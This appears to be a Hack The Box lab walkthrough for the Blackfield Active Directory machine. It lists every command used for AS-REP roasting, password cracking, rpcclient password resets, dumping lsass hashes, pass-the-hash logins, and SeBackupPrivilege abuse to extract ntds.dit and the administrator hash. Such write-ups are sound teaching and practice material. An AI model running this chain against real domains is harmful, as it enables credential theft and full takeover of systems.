SecWalk.com

HTB Walkthrough Blackfield 10.10.10.192

Box Summary:

Blackfield has been released on 6th of june in 2020, Blackfield is rated as Hard.

From nmap we can assume that we are dealing with a AD machine, after some enumeration we can connect to SMB anonymously, when we connect to profiles$ we see a lot usernames but a few stands out since they don’t start with capital letters. after some more enumeration we found out that we could try kerbroasting attack. after getting user credentials we needed some logical thinking, what can we do with this user? turns out we can change a password. after that we get access to another share where are some sensentive files are located, after downloading them we were able te get a hash from svc_backup. Now we were able to get the user flag. Now it’s time for privesc svc_backup has SeBackupPrivilege enabled. After some researching we can exploit this to get Administrator privileges.

Enumeration

Nmap scan

nmap -sV -sC –top-ports=6000 10.10.10.192

This shows it’s an Active Directory machine.

SMB Shares Enumeration
Because SMB in enabled I wanted to check for SMB shares.
smbclient -L 10.10.10.192

Only 1 share is anonymous accessible; profiles$
smbclient //10.10.10.192/profiles$

But by examining the files there was nothing useful in these files.


Rpcclient


Also, anonymous login with RPC failed.
rpcclient 10.10.10.192

Exploitation

After some enumeration of the services which are running I determined that we couldn’t use any of this service for further enumeration. Because this is an Active Directory machine I looked for common Active Directory exploitation vectors.

Resource: https://www.tarlogic.com/en/blog/how-to-attack-kerberos/

We know SMB is enabled, so we can check with common usernames, if one of those usernames pre-auth is enabled for one of the users so we can intercept the hash and crack it.

GetNPUsers.py

Contents of usernames.txt

python GetNPUsers.py blackfield/dc-01 -usersfile usernames.txt -format john -outputfile intercepted_hash

Cracking the intercepted hash

john –wordlist=/usr/share/wordlists/rockyou.txt intercepted_hash

Cracked password: #00^BlackKnight

The credentials are:
support: #00^BlackKnight


RPCclient


I couldn’t access any SMB share with these credentials but I was able to login with rpcclient.
rpcclient -U support 10.10.10.192

First, I enumerated for more users.
enumdomusers

In rpcclient, you have an option called; setuserinfo2. With this option we can update a user’s password.


The only user where I could do this successfully was by: audit2020

setuserinfo2 audit2020 23 IceL0rd

Now that we have updated the audit2020 password, we can try if we can have access to an SMB share.


Access SMB share with updated password


Connecting to the forensic share.
smbclient -U ‘blackfield\audit2020’ \\10.10.10.192\forensic

After some enumeration of the SMB shares, I found an interesting file which can contain a hash.

Now download lsass.zip

smbget smb://10.10.10.192//forensic/memory_analysis/lsass.zip -U audit2020

I used mimidump to dump the hashes
pypykatz lsa minidump lsass.DMP


After this I am going to read out the dump file
svc_backup:9658d1d1dcd9250115e2205d9f48400d

Pass the hash svc_backup


Because port 5985 is open we can use evil-winrm to login with the hash.


evil-winrm -i blackfield -u svc_backup -H ‘9658d1d1dcd9250115e2205d9f48400d’

Post-Exploitation
By enumerating the token, we can see that SeBackupPrivilege token is enabled.


Checking Tokes
Resource: https://github.com/giuliano108/SeBackupPrivilege

Note: This Github page is owned by giuliano108. Secwalk won’t/can’t be responsible for any damage or the content.


whoami /priv


Exploiting the SeBackupPrivilege token


First, we need to download the 2 dll, (see resource) and put on the system.

upload /tmp/Blackfield/exploitation/SeBackupPrivilegeUtils.dll
upload /tmp/Blackfield/exploitation/SeBackupPrivilegeCmdLets.dll

Now we need to import those 2 DLL’s and enable the token.


Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Set-SeBackupPrivilege
Get-SeBackupPrivilege

But we can’t copy the root flag, and read it.

Changing File Permissions NTDS


What we can do is changing file permission of the file ntds.dit (which contain administrator hash).


$user=”blackfield.local\svc_backup”
$folder=”C:\windows\ntds”
$acl = Get-Acl $folder
$rule = new-object System.Security.AccessControl.FileSystemAccessRUle $user, “FullControl”, “ContainerInherit,ObjectInherit”, “None”, “Allow”
$acl.AddAccessRule($rule)
Set-Acl -Path $folder -AclObject $acl


Creating ShadowCopy

In order to create a shadow, copy we run diskshadow with the following lines:


set metadata C:\temp\backup.cab
set context clientaccessibles
set context persistents
begin backups
add volume c: alias mydrives
creates
expose %mydrive% z:s

Uploaded it to target system.
upload /tmp/Blackfield/exploitation/scipt.txt

Diskshadow /s scipt.txt

If we look now in our directories we see 2 files that we need to download in order to dump the hash.

Now we have the 2 files we needed on the Kali system.

Now we can sue secretsdump.py in order to dump the hash.


python secretsdump.py -ntds ntds.dit -system SYSTEM.bak LOCAL -outputfile admin_hash

head -n 5 admin_hash.ntds

Pass the hash Administrator

evil-winrm -i 10.10.10.192 -u administrator -H 184fb5e5178480be64824d4cd53b99ee

Made by: IceL0rd

Disclaimer: Please use our posts for educational purposes only. Wrong usage could make you end up in jail.

Leave a Reply